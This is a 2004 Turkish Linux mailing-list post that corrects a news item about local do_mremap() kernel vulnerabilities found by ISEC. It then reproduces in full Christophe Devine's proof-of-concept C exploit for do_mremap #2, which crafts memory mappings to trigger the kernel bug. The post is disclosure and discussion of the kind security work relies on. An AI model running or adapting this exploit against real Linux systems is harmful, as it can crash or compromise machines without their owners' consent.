From: Murat Koc (murat.koc@frontsite.com.tr)
Date: Tue 24 Feb 2004 - 11:41:00 EST
Selam,
> Açıklar tüm 2.4 serisi, 2.2 den 2.2.25 e kadar ve 2.6 serisi Linux
> çekirdeğinde bulunuyor. 2.4.25 ve 2.6.3 çekirdek sürümleri açığı
> yamamak için yayınlandı.
>
Bunlar yanlış. Bu sürümlerin -rc serilerinde zaten patchler vardı. Hatta
niye bu sürümler geç yayınlandı diye tartışma oldu.
> Çekirdek geliştirme ekibi bu yıl içinde bulunan açıklar için iki yama
> çıkarmak zorunda kaldı.
bu arada bu açıkların local açıklar olduğunu da belirtmek gerekiyor.
> Açıkları bulan Polonyalı İSEC güvenlik firması, açıkları duyurmak için
> yamaların hazırlanmasını beklemiş, ayrıca açıklardan yararlanabilecek
> patlayıcı kodu gelecek hafta yayınlanacak, bu zamanda sistem
> yöneticileri sistemlerini yamayabilecekler.
hımm biraz geç kalmışlar patlayıcı kodu için :) Patlatan patlatır.
----------------------------------------------------------------------
/*
* Proof-of-concept exploit code for do_mremap() #2
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED
#define __NR_real_mremap __NR_mremap
static inline _syscall5 (void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address);
#define VMA_SIZE 0x00003000
int
main (void)
{
int i, ret;
void *base0;
void *base1;
i = 0;
while (1)
{
i++;
ret = (int) mmap ((void *) (i * (VMA_SIZE + 0x1000)),
VMA_SIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
if (ret == -1)
{
perror ("mmap");
break;
}
base0 = base1;
base1 = (void *) ret;
}
printf ("created ~%d VMAs\n", i);
base0 += 0x1000;
base1 += 0x1000;
printf ("now mremapping 0x%08X at 0x%08X\n", (int) base1, (int) base0);
real_mremap (base1, 4096, 4096, MREMAP_FLAGS, base0);
printf ("kernel may not be vulnerable\n");
return (0);
}
-----------------------------------------------------------------------
-- __________ | | | | Murat Koc | | Manager & IT Consultant | FRONT | |==========| FrontSITE Bilgi Teknolojisi A.S. |_____SITE_| http://www.frontsite.com.tr/ -- Attached file included as plaintext by Ecartis -- -- File: signature.asc -- Desc: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQBAO36byHJSQxPy7GoRAg6mAJ0S+HU0pp2E/WsxihQXiVSlxQcexQCg6Jxb RpO661s21cxRvlULn5+6Y+4= =/nQK -----END PGP SIGNATURE----- linux-sohbet listesinden cikmak ve tum listeci islemleri icin http://liste.linux.org.tr/ adresini kullanabilirisniz. Bu listeden cikmak icin <a href="mailto:linux-sohbet-request@liste.linux.org.tr?Subject=unsubscribe">tiklayiniz</a>